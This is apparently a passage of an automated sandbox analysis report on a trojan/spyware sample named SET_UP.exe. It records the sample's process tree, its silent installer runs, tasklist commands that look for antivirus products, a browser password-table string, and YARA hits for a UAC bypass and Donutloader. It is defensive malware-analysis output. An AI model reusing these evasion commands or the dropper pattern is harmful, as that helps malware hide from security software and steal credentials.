                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF4434_2_5000EF44
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF4C34_2_5000EF4C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF5434_2_5000EF54
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF5C34_2_5000EF5C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF6434_2_5000EF64
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF6C34_2_5000EF6C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF7434_2_5000EF74
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF7C34_2_5000EF7C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF8434_2_5000EF84
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF8C34_2_5000EF8C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF9434_2_5000EF94
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF9C34_2_5000EF9C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFA434_2_5000EFA4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFAC34_2_5000EFAC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFB434_2_5000EFB4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFBC34_2_5000EFBC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFC434_2_5000EFC4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFCC34_2_5000EFCC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFD434_2_5000EFD4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFDC34_2_5000EFDC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFE434_2_5000EFE4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFEC34_2_5000EFEC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFF434_2_5000EFF4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFFC34_2_5000EFFC
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 02509910 appears 77 times
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 02515890 appears 67 times
                      Source: SET_UP.exeStatic PE information: invalid certificate
                      Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.4.drStatic PE information: Number of sections : 11 > 10
                      Source: VER7RSX5CP4YEKECQGJ84KT.exe.0.drStatic PE information: Number of sections : 11 > 10
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.6.drStatic PE information: Number of sections : 11 > 10
                      Source: SET_UP.exe, 00000000.00000003.1981809419.00000000038ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameum_player.exe vs SET_UP.exe
                      Source: SET_UP.exe, 00000000.00000000.1655076323.0000000000578000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
                      Source: SET_UP.exe, 00000000.00000003.1981744706.00000000039D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameum_player.exe vs SET_UP.exe
                      Source: SET_UP.exe, 00000000.00000003.1756311196.0000000002C88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
                      Source: SET_UP.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
                      Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: 34.2.IUService.exe.931cb29.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 34.2.IUService.exe.9361bf6.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 34.2.IUService.exe.93627f6.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@56/21@3/2
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5001D4C4 GetDiskFreeSpaceW,@System@@_llmul$qqrv,@System@@_llmul$qqrv,34_2_5001D4C4
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02500AD3 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02500AD3
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000C2EC GetModuleFileNameW,@System@LoadResourceModule$qqrpbo,34_2_5000C2EC
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
                      Source: C:\Users\user\Desktop\SET_UP.exeFile created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe
                      Source: Yara matchFile source: 34.2.IUService.exe.50000000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp, type: DROPPED
                      Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                      Source: SET_UP.exe, 00000000.00000003.1826848306.0000000003538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: SET_UP.exeVirustotal: Detection: 11%
                      Source: SET_UP.exeReversingLabs: Detection: 15%
                      Source: SET_UP.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
                      Source: SET_UP.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
                      Source: SET_UP.exeString found in binary or memory: /LoadInf=
                      Source: SET_UP.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
                      Source: C:\Users\user\Desktop\SET_UP.exeFile read: C:\Users\user\Desktop\SET_UP.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\SET_UP.exe "C:\Users\user\Desktop\SET_UP.exe"
                      Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp "C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$20426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp "C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$30426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
                      Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe "C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe"
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: webio.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: schannel.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: amsi.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: winsta.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coremessaging.dllJump to behavior
